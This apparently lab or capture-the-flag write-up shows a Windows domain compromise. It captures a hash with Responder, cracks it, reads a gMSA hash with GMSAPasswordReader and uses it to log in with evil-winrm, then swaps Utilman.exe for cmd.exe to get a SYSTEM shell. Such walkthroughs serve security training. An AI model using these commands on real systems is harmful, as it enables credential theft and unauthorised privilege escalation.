# 80 ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c71b5c7ede6da8aab361977da88989c714d8d521%2F70d6907bed51133f8c521ea681be8758.png?alt=media) ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0c624077fde687d799631c094ff2813bbecaa776%2F305f020ea8ec48dac347b2658b936b85.png?alt=media) We can try running responder and visiting our ip: ``` sudo responder -I tun0 -A ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-51ca9c42d3c9aec273e4fcfddda7f31694bc4abc%2F342c0433b97a127037c631ffa5ae36bc.png?alt=media) We get a hash back: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c1643f1d132001b8f18e9dd37b641bd44d7ca868%2Fd6bbca990cb80d1186afac37930d94d9.png?alt=media) We can crack this with hashcat: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-bdd95f4b7a96c29f897dfc802f8d5ce5e536428f%2F6fd5975685f43220a5447b7a69f93d46.png?alt=media) We got california: We can login with evil-winrm: ``` evil-winrm -i 192.168.180.165 -u enox -p 'california' ``` We find a todo.txt in desktop of enox: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-46794e532c142ed2ef759336fc16036218a62ad6%2F4346d51c29e6d6b4a37eb57bcf6a0b28.png?alt=media) We can check for gmsa with powerview: ``` . .\PowerView.ps1 ``` ``` Get-ADServiceAccount -Filter * -Properties * | Select SamAccountName,PrincipalsAllowedToRetrieveManagedPassword,msDS-ManagedPasswordInterval,ServicePrincipalNames ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c947f626e6b6d14dc3d0ad84b6bf7fef9af4990b%2Fb4d6555ef7993fe507c4e2e3eb7775df.png?alt=media) Now we can use GMSAPasswordReader.exe: ``` .\GMSAPasswordReader.exe --accountname 'svc_apache' ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-501a213f6c4b64b67858ea49d4fce48234e0a06d%2F63b34c5ee50f29aac488fdb47652b8e6.png?alt=media) rc4\_hmac hash is the same as the NT hash. Now login using evil-winrm: ``` evil-winrm -i 192.168.183.165 -u svc_apache$ -H '4FC1682833B24CF2225248D67DF7E618' ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-8e5db3adfff01b366dad76f29ad8445211bb1799%2F8d8f7682f50275ba1bc4b0af25fb10bd.png?alt=media) We have SeRestorePrivilege. Now using this page: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-2489cb2db1e1c090c86614a49b295032e44e558c%2Ff54b0e55a216ac779bf61981ab82ffa4.png?alt=media) ``` ren "C:/Windows/System32/Utilman.exe" Utilman.old ``` ``` ren "C:/Windows/System32/cmd.exe" Utilman.exe ``` Now we can get to the lockscreen with rdesktop: ``` rdesktop 192.168.180.254 ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0e3823bcc60a345a3da443cf8dbd8fec5706dbd1%2F815b7883b8d4d8ebf8175bd54adbacd9.png?alt=media) Now press `win + U` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-1e7e470979050c44a52da682c8aca891a912e18f%2F70128606d6743f36ded129e883e01238.png?alt=media) We have nt authority\system. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d090e949cbd1c383828901aaba1438614394a63e%2F3e569bb1f993f056f7476fd010018baa.png?alt=media)